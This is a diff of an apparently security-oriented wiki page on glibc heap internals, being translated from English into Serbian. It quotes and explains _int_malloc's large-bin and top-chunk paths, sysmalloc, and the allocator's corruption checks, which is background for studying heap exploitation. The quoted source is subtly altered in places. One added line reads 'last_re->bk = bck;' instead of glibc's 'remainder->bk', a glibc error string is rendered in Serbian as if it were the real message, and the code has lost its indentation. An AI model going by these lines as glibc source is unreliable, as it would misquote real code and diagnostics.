+have to perform a complete insert here.  */
+bck = unsorted_chunks (av);
+fwd = bck->fd;
+if (__glibc_unlikely (fwd->bk != bck))
+malloc_printerr ("malloc(): corrupted unsorted chunks");
+last_re->bk = bck;
+remainder->fd = fwd;
+bck->fd = remainder;
+fwd->bk = remainder;
+if (!in_smallbin_range (remainder_size))
+{
+remainder->fd_nextsize = NULL;
+remainder->bk_nextsize = NULL;
+}
+set_head (victim, nb | PREV_INUSE |
+(av != &main_arena ? NON_MAIN_ARENA : 0));
+set_head (remainder, remainder_size | PREV_INUSE);
+set_foot (remainder, remainder_size);
+}
+check_malloced_chunk (av, victim, nb);
+void *p = chunk2mem (victim);
+alloc_perturb (p, bytes);
+return p;
+}
+}
 ```
-
 

 
-If a chunk isn't found suitable for this, continue
+Ako se deo ne pronađe kao pogodan za ovo, nastavite
 
-### Large Bin (next bigger)
+### Velika kesa (sledeća veća)
 
-If in the exact large bin there wasn't any chunk that could be used, start looping through all the next large bin (starting y the immediately larger) until one is found (if any).
+Ako u tačnoj velikoj kesi nije bilo nijednog dela koji bi mogao da se koristi, počnite da prolazite kroz sve sledeće velike kese (počinjajući od odmah veće) dok se ne pronađe jedan (ako ih ima).
 
-The reminder of the split chunk is added in the unsorted bin, last_reminder is updated and the same security check is performed:
+Ostatak podeljenog dela se dodaje u nesortiranu kesu, last_reminder se ažurira i vrši se ista provera bezbednosti:
 
-- `bck->fd-> bk != bck`: `malloc(): corrupted unsorted chunks2`
+- `bck->fd-> bk != bck`: `malloc(): oštećeni nesortirani delovi2`
 
 

 
-_int_malloc Large bin (next bigger)
-
+_int_malloc Velika kesa (sledeća veća)
 ```c
 // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c#L4319C7-L4425C10
 
 /*
-         Search for a chunk by scanning bins, starting with next largest
-         bin. This search is strictly by best-fit; i.e., the smallest
-         (with ties going to approximately the least recently used) chunk
-         that fits is selected.
+Search for a chunk by scanning bins, starting with next largest
+bin. This search is strictly by best-fit; i.e., the smallest
+(with ties going to approximately the least recently used) chunk
+that fits is selected.
 
-         The bitmap avoids needing to check that most blocks are nonempty.
-         The particular case of skipping all bins during warm-up phases
-         when no chunks have been returned yet is faster than it might look.
-       */
+The bitmap avoids needing to check that most blocks are nonempty.
+The particular case of skipping all bins during warm-up phases
+when no chunks have been returned yet is faster than it might look.
+*/
 
-      ++idx;
-      bin = bin_at (av, idx);
-      block = idx2block (idx);
-      map = av->binmap[block];
-      bit = idx2bit (idx);
+++idx;
+bin = bin_at (av, idx);
+block = idx2block (idx);
+map = av->binmap[block];
+bit = idx2bit (idx);
 
-      for (;; )
-        {
-          /* Skip rest of block if there are no more set bits in this block.  */
-          if (bit > map || bit == 0)
-            {
-              do
-                {
-                  if (++block >= BINMAPSIZE) /* out of bins */
-                    goto use_top;
-                }
-              while ((map = av->binmap[block]) == 0);
+for (;; )
+{
+/* Skip rest of block if there are no more set bits in this block.  */
+if (bit > map || bit == 0)
+{
+do
+{
+if (++block >= BINMAPSIZE) /* out of bins */
+goto use_top;
+}
+while ((map = av->binmap[block]) == 0);
 
-              bin = bin_at (av, (block << BINMAPSHIFT));
-              bit = 1;
-            }
+bin = bin_at (av, (block << BINMAPSHIFT));
+bit = 1;
+}
 
-          /* Advance to bin with set bit. There must be one. */
-          while ((bit & map) == 0)
-            {
-              bin = next_bin (bin);
-              bit <<= 1;
-              assert (bit != 0);
-            }
+/* Advance to bin with set bit. There must be one. */
+while ((bit & map) == 0)
+{
+bin = next_bin (bin);
+bit <<= 1;
+assert (bit != 0);
+}
 
-          /* Inspect the bin. It is likely to be non-empty */
-          victim = last (bin);
+/* Inspect the bin. It is likely to be non-empty */
+victim = last (bin);
 
-          /*  If a false alarm (empty bin), clear the bit. */
-          if (victim == bin)
-            {
-              av->binmap[block] = map &= ~bit; /* Write through */
-              bin = next_bin (bin);
-              bit <<= 1;
-            }
+/*  If a false alarm (empty bin), clear the bit. */
+if (victim == bin)
+{
+av->binmap[block] = map &= ~bit; /* Write through */
+bin = next_bin (bin);
+bit <<= 1;
+}
 
-          else
-            {
-              size = chunksize (victim);
+else
+{
+size = chunksize (victim);
 
-              /*  We know the first chunk in this bin is big enough to use. */
-              assert ((unsigned long) (size) >= (unsigned long) (nb));
+/*  We know the first chunk in this bin is big enough to use. */
+assert ((unsigned long) (size) >= (unsigned long) (nb));
 
-              remainder_size = size - nb;
+remainder_size = size - nb;
 
-              /* unlink */
-              unlink_chunk (av, victim);
+/* unlink */
+unlink_chunk (av, victim);
 
-              /* Exhaust */
-              if (remainder_size < MINSIZE)
-                {
-                  set_inuse_bit_at_offset (victim, size);
-                  if (av != &main_arena)
-		    set_non_main_arena (victim);
-                }
+/* Exhaust */
+if (remainder_size < MINSIZE)
+{
+set_inuse_bit_at_offset (victim, size);
+if (av != &main_arena)
+set_non_main_arena (victim);
+}
 
-              /* Split */
-              else
-                {
-                  remainder = chunk_at_offset (victim, nb);
+/* Split */
+else
+{
+remainder = chunk_at_offset (victim, nb);
 
-                  /* We cannot assume the unsorted list is empty and therefore
-                     have to perform a complete insert here.  */
-                  bck = unsorted_chunks (av);
-                  fwd = bck->fd;
-		  if (__glibc_unlikely (fwd->bk != bck))
-		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
-                  remainder->bk = bck;
-                  remainder->fd = fwd;
-                  bck->fd = remainder;
-                  fwd->bk = remainder;
+/* We cannot assume the unsorted list is empty and therefore
+have to perform a complete insert here.  */
+bck = unsorted_chunks (av);
+fwd = bck->fd;
+if (__glibc_unlikely (fwd->bk != bck))
+malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+remainder->bk = bck;
+remainder->fd = fwd;
+bck->fd = remainder;
+fwd->bk = remainder;
 
-                  /* advertise as last remainder */
-                  if (in_smallbin_range (nb))
-                    av->last_remainder = remainder;
-                  if (!in_smallbin_range (remainder_size))
-                    {
-                      remainder->fd_nextsize = NULL;
-                      remainder->bk_nextsize = NULL;
-                    }
-                  set_head (victim, nb | PREV_INUSE |
-                            (av != &main_arena ? NON_MAIN_ARENA : 0));
-                  set_head (remainder, remainder_size | PREV_INUSE);
-                  set_foot (remainder, remainder_size);
-                }
-              check_malloced_chunk (av, victim, nb);
-              void *p = chunk2mem (victim);
-              alloc_perturb (p, bytes);
-              return p;
-            }
-        }
+/* advertise as last remainder */
+if (in_smallbin_range (nb))
+av->last_remainder = remainder;
+if (!in_smallbin_range (remainder_size))
+{
+remainder->fd_nextsize = NULL;
+remainder->bk_nextsize = NULL;
+}
+set_head (victim, nb | PREV_INUSE |
+(av != &main_arena ? NON_MAIN_ARENA : 0));
+set_head (remainder, remainder_size | PREV_INUSE);
+set_foot (remainder, remainder_size);
+}
+check_malloced_chunk (av, victim, nb);
+void *p = chunk2mem (victim);
+alloc_perturb (p, bytes);
+return p;
+}
+}
 ```
-
 

 
 ### Top Chunk
 
-At this point, it's time to get a new chunk from the Top chunk (if big enough).
+U ovom trenutku, vreme je da se dobije novi chunk iz Top chunk-a (ako je dovoljno velik).
 
-It starts with a security check making sure that the size of the chunk size is not too big (corrupted):
+Počinje sa bezbednosnom proverom kako bi se osiguralo da veličina chunk-a nije prevelika (korumpirana):
 
 - `chunksize(av->top) > av->system_mem`: `malloc(): corrupted top size`
 
-Then, it'll use the top chunk space if it's large enough to create a chunk of the requested size.\
-If not, if there are fast chunks, consolidate them and try again.\
-Finally, if not enough space use `sysmalloc` to allocate enough size.
+Zatim će koristiti prostor top chunk-a ako je dovoljno velik da kreira chunk tražene veličine.\
+Ako nije, ako postoje brzi chunk-ovi, konsolidujte ih i pokušajte ponovo.\
+Na kraju, ako nema dovoljno prostora, koristite `sysmalloc` da alocirate dovoljnu veličinu.
 
 

 
 _int_malloc Top chunk
-
 ```c
 use_top:
-      /*
-         If large enough, split off the chunk bordering the end of memory
-         (held in av->top). Note that this is in accord with the best-fit
-         search rule.  In effect, av->top is treated as larger (and thus
-         less well fitting) than any other available chunk since it can
-         be extended to be as large as necessary (up to system
-         limitations).
+/*
+If large enough, split off the chunk bordering the end of memory
+(held in av->top). Note that this is in accord with the best-fit
+search rule.  In effect, av->top is treated as larger (and thus
+less well fitting) than any other available chunk since it can
+be extended to be as large as necessary (up to system
+limitations).
 
-         We require that av->top always exists (i.e., has size >=
-         MINSIZE) after initialization, so if it would otherwise be
-         exhausted by current request, it is replenished. (The main
-         reason for ensuring it exists is that we may need MINSIZE space
-         to put in fenceposts in sysmalloc.)
-       */
+We require that av->top always exists (i.e., has size >=
+MINSIZE) after initialization, so if it would otherwise be
+exhausted by current request, it is replenished. (The main
+reason for ensuring it exists is that we may need MINSIZE space
+to put in fenceposts in sysmalloc.)
+*/
 
-      victim = av->top;
-      size = chunksize (victim);
+victim = av->top;
+size = chunksize (victim);
 
-      if (__glibc_unlikely (size > av->system_mem))
-        malloc_printerr ("malloc(): corrupted top size");
+if (__glibc_unlikely (size > av->system_mem))
+malloc_printerr ("malloc(): corrupted top size");
 
-      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
-        {
-          remainder_size = size - nb;
-          remainder = chunk_at_offset (victim, nb);
-          av->top = remainder;
-          set_head (victim, nb | PREV_INUSE |
-                    (av != &main_arena ? NON_MAIN_ARENA : 0));
-          set_head (remainder, remainder_size | PREV_INUSE);
+if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+{
+remainder_size = size - nb;
+remainder = chunk_at_offset (victim, nb);
+av->top = remainder;
+set_head (victim, nb | PREV_INUSE |
+(av != &main_arena ? NON_MAIN_ARENA : 0));
+set_head (remainder, remainder_size | PREV_INUSE);
 
-          check_malloced_chunk (av, victim, nb);
-          void *p = chunk2mem (victim);
-          alloc_perturb (p, bytes);
-          return p;
-        }
+check_malloced_chunk (av, victim, nb);
+void *p = chunk2mem (victim);
+alloc_perturb (p, bytes);
+return p;
+}
 
-      /* When we are using atomic ops to free fast chunks we can get
-         here for all block sizes.  */
-      else if (atomic_load_relaxed (&av->have_fastchunks))
-        {
-          malloc_consolidate (av);
-          /* restore original bin index */
-          if (in_smallbin_range (nb))
-            idx = smallbin_index (nb);
-          else
-            idx = largebin_index (nb);
-        }
+/* When we are using atomic ops to free fast chunks we can get
+here for all block sizes.  */
+else if (atomic_load_relaxed (&av->have_fastchunks))
+{
+malloc_consolidate (av);
+/* restore original bin index */
+if (in_smallbin_range (nb))
+idx = smallbin_index (nb);
+else
+idx = largebin_index (nb);
+}
 
-      /*
-         Otherwise, relay to handle system-dependent cases
-       */
-      else
-        {
-          void *p = sysmalloc (nb, av);
-          if (p != NULL)
-            alloc_perturb (p, bytes);
-          return p;
-        }
-    }
+/*
+Otherwise, relay to handle system-dependent cases
+*/
+else
+{
+void *p = sysmalloc (nb, av);
+if (p != NULL)
+alloc_perturb (p, bytes);
+return p;
+}
+}
 }
 
 ```
-
 

 
 ## sysmalloc
 
 ### sysmalloc start
 
-If arena is null or the requested size is too big (and there are mmaps left permitted) use `sysmalloc_mmap` to allocate space and return it.
+Ako je arena null ili je tražena veličina prevelika (i preostali mmaps su dozvoljeni) koristi `sysmalloc_mmap` za alokaciju prostora i vraćanje istog.
 
 

 
 sysmalloc start
-
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2531
 
 /*
-   sysmalloc handles malloc cases requiring more memory from the system.
-   On entry, it is assumed that av->top does not have enough
-   space to service request for nb bytes, thus requiring that av->top
-   be extended or replaced.
- */
+sysmalloc handles malloc cases requiring more memory from the system.
+On entry, it is assumed that av->top does not have enough
+space to service request for nb bytes, thus requiring that av->top
+be extended or replaced.
+*/
 
- static void *
+static void *
 sysmalloc (INTERNAL_SIZE_T nb, mstate av)
 {
-  mchunkptr old_top;              /* incoming value of av->top */
-  INTERNAL_SIZE_T old_size;       /* its size */
-  char *old_end;                  /* its end address */
+mchunkptr old_top;              /* incoming value of av->top */
+INTERNAL_SIZE_T old_size;       /* its size */
+char *old_end;                  /* its end address */
 
-  long size;                      /* arg to first MORECORE or mmap call */
-  char *brk;                      /* return value from MORECORE */
+long size;                      /* arg to first MORECORE or mmap call */
+char *brk;                      /* return value from MORECORE */
 
-  long correction;                /* arg to 2nd MORECORE call */
-  char *snd_brk;                  /* 2nd return val */
+long correction;                /* arg to 2nd MORECORE call */
+char *snd_brk;                  /* 2nd return val */
 
-  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
-  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
-  char *aligned_brk;              /* aligned offset into brk */
+INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+char *aligned_brk;              /* aligned offset into brk */
 
-  mchunkptr p;                    /* the allocated/returned chunk */
-  mchunkptr remainder;            /* remainder from allocation */
-  unsigned long remainder_size;   /* its size */
+mchunkptr p;                    /* the allocated/returned chunk */
+mchunkptr remainder;            /* remainder from allocation */
+unsigned long remainder_size;   /* its size */
 
 
-  size_t pagesize = GLRO (dl_pagesize);
-  bool tried_mmap = false;
+size_t pagesize = GLRO (dl_pagesize);
+bool tried_mmap = false;
 
 
-  /*
-     If have mmap, and the request size meets the mmap threshold, and
-     the system supports mmap, and there are few enough currently
-     allocated mmapped regions, try to directly map this request
-     rather than expanding top.
-   */
+/*
+If have mmap, and the request size meets the mmap threshold, and
+the system supports mmap, and there are few enough currently
+allocated mmapped regions, try to directly map this request
+rather than expanding top.
+*/
 
-  if (av == NULL
-      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
-	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
-    {
-      char *mm;
-      if (mp_.hp_pagesize > 0 && nb >= mp_.hp_pagesize)
-	{
-	  /* There is no need to issue the THP madvise call if Huge Pages are
-	     used directly.  */
-	  mm = sysmalloc_mmap (nb, mp_.hp_pagesize, mp_.hp_flags, av);
-	  if (mm != MAP_FAILED)
-	    return mm;
-	}
-      mm = sysmalloc_mmap (nb, pagesize, 0, av);
-      if (mm != MAP_FAILED)
-	return mm;
-      tried_mmap = true;
-    }
+if (av == NULL
+|| ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+&& (mp_.n_mmaps < mp_.n_mmaps_max)))
+{
+char *mm;
+if (mp_.hp_pagesize > 0 && nb >= mp_.hp_pagesize)
+{
+/* There is no need to issue the THP madvise call if Huge Pages are
+used directly.  */
+mm = sysmalloc_mmap (nb, mp_.hp_pagesize, mp_.hp_flags, av);
+if (mm != MAP_FAILED)
+return mm;
+}
+mm = sysmalloc_mmap (nb, pagesize, 0, av);
+if (mm != MAP_FAILED)
+return mm;
+tried_mmap = true;
+}
 
-  /* There are no usable arenas and mmap also failed.  */
-  if (av == NULL)
-    return 0;
+/* There are no usable arenas and mmap also failed.  */
+if (av == NULL)
+return 0;
 ```
-
 

 
-### sysmalloc checks
+### sysmalloc provere
 
-It starts by getting old top chunk information and checking that some of the following condations are true:
+Započinje dobijanjem informacija o starom top chunk-u i proverava da li su neki od sledećih uslova tačni:
 
-- The old heap size is 0 (new heap)
-- The size of the previous heap is greater and MINSIZE and the old Top is in use
-- The heap is aligned to page size (0x1000 so the lower 12 bits need to be 0)
+- Stara veličina heap-a je 0 (novi heap)
+- Veličina prethodnog heap-a je veća od MINSIZE i stari Top je u upotrebi
+- Heap je poravnat na veličinu stranice (0x1000, tako da donjih 12 bita treba da budu 0)
 
-Then it also checks that:
+Takođe proverava da li:
 
-- The old size hasn't enough space to create a chunk for the requested size
+- Stara veličina nema dovoljno prostora za kreiranje chunk-a za traženu veličinu
 
 

 
-sysmalloc checks
-
+sysmalloc provere
 ```c
 /* Record incoming configuration of top */
 
-  old_top = av->top;
-  old_size = chunksize (old_top);
-  old_end = (char *) (chunk_at_offset (old_top, old_size));
+old_top = av->top;
+old_size = chunksize (old_top);
+old_end = (char *) (chunk_at_offset (old_top, old_size));
 
-  brk = snd_brk = (char *) (MORECORE_FAILURE);
+brk = snd_brk = (char *) (MORECORE_FAILURE);
 
-  /*
-     If not the first time through, we require old_size to be
-     at least MINSIZE and to have prev_inuse set.
-   */
+/*
+If not the first time through, we require old_size to be
+at least MINSIZE and to have prev_inuse set.
+*/
 
-  assert ((old_top == initial_top (av) && old_size == 0) ||
-          ((unsigned long) (old_size) >= MINSIZE &&
-           prev_inuse (old_top) &&
-           ((unsigned long) old_end & (pagesize - 1)) == 0));
+assert ((old_top == initial_top (av) && old_size == 0) ||
+((unsigned long) (old_size) >= MINSIZE &&
+prev_inuse (old_top) &&
+((unsigned long) old_end & (pagesize - 1)) == 0));
 
-  /* Precondition: not enough current space to satisfy nb request */
-  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+/* Precondition: not enough current space to satisfy nb request */
+assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
 ```
-
 

 
-### sysmalloc not main arena
+### sysmalloc ne glavna arena
 
-It'll first try to **extend** the previous heap for this heap. If not possible try to **allocate a new heap** and update the pointers to be able to use it.\
-Finally if that didn't work, try calling **`sysmalloc_mmap`**. 
+Prvo će pokušati da **proširi** prethodni heap za ovaj heap. Ako to nije moguće, pokušaće da **alokira novi heap** i ažurira pokazivače kako bi mogli da ga koriste.\
+Na kraju, ako to nije uspelo, pokušaće da pozove **`sysmalloc_mmap`**. 
 
 

 
-sysmalloc not main arena
-
+sysmalloc ne glavna arena
 ```c
 if (av != &main_arena)
-    {
-      heap_info *old_heap, *heap;
-      size_t old_heap_size;
+{
+heap_info *old_heap, *heap;
+size_t old_heap_size;
 
-      /* First try to extend the current heap. */
-      old_heap = heap_for_ptr (old_top);
-      old_heap_size = old_heap->size;
-      if ((long) (MINSIZE + nb - old_size) > 0
-          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
-        {
-          av->system_mem += old_heap->size - old_heap_size;
-          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
-                    | PREV_INUSE);
-        }
-      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
-        {
-          /* Use a newly allocated heap.  */
-          heap->ar_ptr = av;
-          heap->prev = old_heap;
-          av->system_mem += heap->size;
-          /* Set up the new top.  */
-          top (av) = chunk_at_offset (heap, sizeof (*heap));
-          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+/* First try to extend the current heap. */
+old_heap = heap_for_ptr (old_top);
+old_heap_size = old_heap->size;
+if ((long) (MINSIZE + nb - old_size) > 0
+&& grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+{
+av->system_mem += old_heap->size - old_heap_size;
+set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+| PREV_INUSE);
+}
+else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+{
+/* Use a newly allocated heap.  */
+heap->ar_ptr = av;
+heap->prev = old_heap;
+av->system_mem += heap->size;
+/* Set up the new top.  */
+top (av) = chunk_at_offset (heap, sizeof (*heap));
+set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
 
-          /* Setup fencepost and free the old top chunk with a multiple of
-             MALLOC_ALIGNMENT in size. */
-          /* The fencepost takes at least MINSIZE bytes, because it might
-             become the top chunk again later.  Note that a footer is set
-             up, too, although the chunk is marked in use. */
-          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
-          set_head (chunk_at_offset (old_top, old_size + CHUNK_HDR_SZ),
-		    0 | PREV_INUSE);
-          if (old_size >= MINSIZE)
-            {
-              set_head (chunk_at_offset (old_top, old_size),
-			CHUNK_HDR_SZ | PREV_INUSE);
-              set_foot (chunk_at_offset (old_top, old_size), CHUNK_HDR_SZ);
-              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
-              _int_free (av, old_top, 1);
-            }
-          else
-            {
-              set_head (old_top, (old_size + CHUNK_HDR_SZ) | PREV_INUSE);
-              set_foot (old_top, (old_size + CHUNK_HDR_SZ));
-            }
-        }
-      else if (!tried_mmap)
-	{
-	  /* We can at least try to use to mmap memory.  If new_heap fails
-	     it is unlikely that trying to allocate huge pages will
-	     succeed.  */
-	  char *mm = sysmalloc_mmap (nb, pagesize, 0, av);
-	  if (mm != MAP_FAILED)
-	    return mm;
-	}
-    }
+/* Setup fencepost and free the old top chunk with a multiple of
+MALLOC_ALIGNMENT in size. */
+/* The fencepost takes at least MINSIZE bytes, because it might
+become the top chunk again later.  Note that a footer is set
+up, too, although the chunk is marked in use. */
+old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+set_head (chunk_at_offset (old_top, old_size + CHUNK_HDR_SZ),
+0 | PREV_INUSE);
+if (old_size >= MINSIZE)
+{
+set_head (chunk_at_offset (old_top, old_size),
+CHUNK_HDR_SZ | PREV_INUSE);
+set_foot (chunk_at_offset (old_top, old_size), CHUNK_HDR_SZ);
+set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+_int_free (av, old_top, 1);
+}
+else
+{
+set_head (old_top, (old_size + CHUNK_HDR_SZ) | PREV_INUSE);
+set_foot (old_top, (old_size + CHUNK_HDR_SZ));
+}
+}
+else if (!tried_mmap)
+{
+/* We can at least try to use to mmap memory.  If new_heap fails
+it is unlikely that trying to allocate huge pages will
+succeed.  */
+char *mm = sysmalloc_mmap (nb, pagesize, 0, av);
+if (mm != MAP_FAILED)
+return mm;
+}
+}
 ```
-
 

 
-### sysmalloc main arena
+### sysmalloc glavna arena
 
-It starts calculating the amount of memory needed. It'll start by requesting contiguous memory so in this case it'll be possible to use the old memory not used. Also some align operations are performed.
+Počinje da izračunava količinu potrebne memorije. Počeće tako što će zatražiti kontiguitetnu memoriju, tako da će u ovom slučaju biti moguće koristiti staru neiskorišćenu memoriju. Takođe se vrše neke operacije poravnanja.
 
 

 
-sysmalloc main arena
-
+sysmalloc glavna arena
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2665C1-L2713C10
 
-  else     /* av == main_arena */
+else     /* av == main_arena */
 
 
-    { /* Request enough space for nb + pad + overhead */
-      size = nb + mp_.top_pad + MINSIZE;
+{ /* Request enough space for nb + pad + overhead */
+size = nb + mp_.top_pad + MINSIZE;
 
-      /*
-         If contiguous, we can subtract out existing space that we hope to
-         combine with new space. We add it back later only if
-         we don't actually get contiguous space.
-       */
+/*
+If contiguous, we can subtract out existing space that we hope to
+combine with new space. We add it back later only if
+we don't actually get contiguous space.
+*/
 
-      if (contiguous (av))
-        size -= old_size;
+if (contiguous (av))
+size -= old_size;
 
-      /*
-         Round to a multiple of page size or huge page size.
-         If MORECORE is not contiguous, this ensures that we only call it
-         with whole-page arguments.  And if MORECORE is contiguous and
-         this is not first time through, this preserves page-alignment of
-         previous calls. Otherwise, we correct to page-align below.
-       */
+/*
+Round to a multiple of page size or huge page size.
+If MORECORE is not contiguous, this ensures that we only call it
+with whole-page arguments.  And if MORECORE is contiguous and
+this is not first time through, this preserves page-alignment of
+previous calls. Otherwise, we correct to page-align below.
+*/
 
 #ifdef MADV_HUGEPAGE
-      /* Defined in brk.c.  */
-      extern void *__curbrk;
-      if (__glibc_unlikely (mp_.thp_pagesize != 0))
-	{
-	  uintptr_t top = ALIGN_UP ((uintptr_t) __curbrk + size,
-				    mp_.thp_pagesize);
-	  size = top - (uintptr_t) __curbrk;
-	}
-      else
+/* Defined in brk.c.  */
+extern void *__curbrk;
+if (__glibc_unlikely (mp_.thp_pagesize != 0))
+{
+uintptr_t top = ALIGN_UP ((uintptr_t) __curbrk + size,
+mp_.thp_pagesize);
+size = top - (uintptr_t) __curbrk;
+}
+else
 #endif
-	size = ALIGN_UP (size, GLRO(dl_pagesize));
+size = ALIGN_UP (size, GLRO(dl_pagesize));
 
-      /*
-         Don't try to call MORECORE if argument is so big as to appear
-         negative. Note that since mmap takes size_t arg, it may succeed
-         below even if we cannot call MORECORE.
-       */
+/*
+Don't try to call MORECORE if argument is so big as to appear
+negative. Note that since mmap takes size_t arg, it may succeed
+below even if we cannot call MORECORE.
+*/
 
-      if (size > 0)
-        {
-          brk = (char *) (MORECORE (size));
-	  if (brk != (char *) (MORECORE_FAILURE))
-	    madvise_thp (brk, size);
-          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
-        }
+if (size > 0)
+{
+brk = (char *) (MORECORE (size));
+if (brk != (char *) (MORECORE_FAILURE))
+madvise_thp (brk, size);
+LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+}
 ```
-
 

 
-### sysmalloc main arena previous error 1
+### sysmalloc glavna arena prethodna greška 1
 
-If the previous returned `MORECORE_FAILURE`, try agin to allocate memory using `sysmalloc_mmap_fallback`
+Ako je prethodno vraćeno `MORECORE_FAILURE`, pokušajte ponovo da alocirate memoriju koristeći `sysmalloc_mmap_fallback`
 
 

 
-sysmalloc main arena previous error 1
-
+sysmalloc glavna arena prethodna greška 1
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2715C7-L2740C10
 
 if (brk == (char *) (MORECORE_FAILURE))
-        {
-          /*
-             If have mmap, try using it as a backup when MORECORE fails or
-             cannot be used. This is worth doing on systems that have "holes" in
-             address space, so sbrk cannot extend to give contiguous space, but
-             space is available elsewhere.  Note that we ignore mmap max count
-             and threshold limits, since the space will not be used as a
-             segregated mmap region.
-           */
+{
+/*
+If have mmap, try using it as a backup when MORECORE fails or
+cannot be used. This is worth doing on systems that have "holes" in
+address space, so sbrk cannot extend to give contiguous space, but
+space is available elsewhere.  Note that we ignore mmap max count
+and threshold limits, since the space will not be used as a
+segregated mmap region.
+*/
 
-	  char *mbrk = MAP_FAILED;
-	  if (mp_.hp_pagesize > 0)
-	    mbrk = sysmalloc_mmap_fallback (&size, nb, old_size,
-					    mp_.hp_pagesize, mp_.hp_pagesize,
-					    mp_.hp_flags, av);
-	  if (mbrk == MAP_FAILED)
-	    mbrk = sysmalloc_mmap_fallback (&size, nb, old_size, MMAP_AS_MORECORE_SIZE,
-					    pagesize, 0, av);
-	  if (mbrk != MAP_FAILED)
-	    {
-	      /* We do not need, and cannot use, another sbrk call to find end */
-	      brk = mbrk;
-	      snd_brk = brk + size;
-	    }
-        }
+char *mbrk = MAP_FAILED;
+if (mp_.hp_pagesize > 0)
+mbrk = sysmalloc_mmap_fallback (&size, nb, old_size,
+mp_.hp_pagesize, mp_.hp_pagesize,
+mp_.hp_flags, av);
+if (mbrk == MAP_FAILED)
+mbrk = sysmalloc_mmap_fallback (&size, nb, old_size, MMAP_AS_MORECORE_SIZE,
+pagesize, 0, av);
+if (mbrk != MAP_FAILED)
+{
+/* We do not need, and cannot use, another sbrk call to find end */
+brk = mbrk;
+snd_brk = brk + size;
+}
+}
 ```
-
 

 
-### sysmalloc main arena continue
+### sysmalloc glavna arena nastavak
 
-If the previous didn't return `MORECORE_FAILURE`, if it worked create some alignments:
+Ako prethodno nije vratilo `MORECORE_FAILURE`, ako je uspelo, kreirajte neka poravnanja:
 
 

 
-sysmalloc main arena previous error 2
-
+sysmalloc glavna arena prethodna greška 2
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2742
 
 if (brk != (char *) (MORECORE_FAILURE))
-        {
-          if (mp_.sbrk_base == 0)
-            mp_.sbrk_base = brk;
-          av->system_mem += size;
+{
+if (mp_.sbrk_base == 0)
+mp_.sbrk_base = brk;
+av->system_mem += size;
 
-          /*
-             If MORECORE extends previous space, we can likewise extend top size.
-           */
+/*
+If MORECORE extends previous space, we can likewise extend top size.
+*/
 
-          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
-            set_head (old_top, (size + old_size) | PREV_INUSE);
+if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+set_head (old_top, (size + old_size) | PREV_INUSE);
 
-          else if (contiguous (av) && old_size && brk < old_end)
-	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
-	    malloc_printerr ("break adjusted to free malloc space");
+else if (contiguous (av) && old_size && brk < old_end)
+/* Oops!  Someone else killed our space..  Can't touch anything.  */
+malloc_printerr ("break adjusted to free malloc space");
 
-          /*
-             Otherwise, make adjustments:
+/*
+Otherwise, make adjustments:
 
-           * If the first time through or noncontiguous, we need to call sbrk
-              just to find out where the end of memory lies.
+* If the first time through or noncontiguous, we need to call sbrk
+just to find out where the end of memory lies.
 
-           * We need to ensure that all returned chunks from malloc will meet
-              MALLOC_ALIGNMENT
+* We need to ensure that all returned chunks from malloc will meet
+MALLOC_ALIGNMENT
 
-           * If there was an intervening foreign sbrk, we need to adjust sbrk
-              request size to account for fact that we will not be able to
-              combine new space with existing space in old_top.
+* If there was an intervening foreign sbrk, we need to adjust sbrk
+request size to account for fact that we will not be able to
+combine new space with existing space in old_top.
 
-           * Almost all systems internally allocate whole pages at a time, in
-              which case we might as well use the whole last page of request.
-              So we allocate enough more memory to hit a page boundary now,
-              which in turn causes future contiguous calls to page-align.
-           */
+* Almost all systems internally allocate whole pages at a time, in
+which case we might as well use the whole last page of request.
+So we allocate enough more memory to hit a page boundary now,
+which in turn causes future contiguous calls to page-align.
+*/
 
-          else
-            {
-              front_misalign = 0;
-              end_misalign = 0;
-              correction = 0;
-              aligned_brk = brk;
+else
+{
+front_misalign = 0;
+end_misalign = 0;
+correction = 0;
+aligned_brk = brk;
 
-              /* handle contiguous cases */
-              if (contiguous (av))
-                {
-                  /* Count foreign sbrk as system_mem.  */
-                  if (old_size)
-                    av->system_mem += brk - old_end;
+/* handle contiguous cases */
+if (contiguous (av))
+{
+/* Count foreign sbrk as system_mem.  */
+if (old_size)
+av->system_mem += brk - old_end;
 
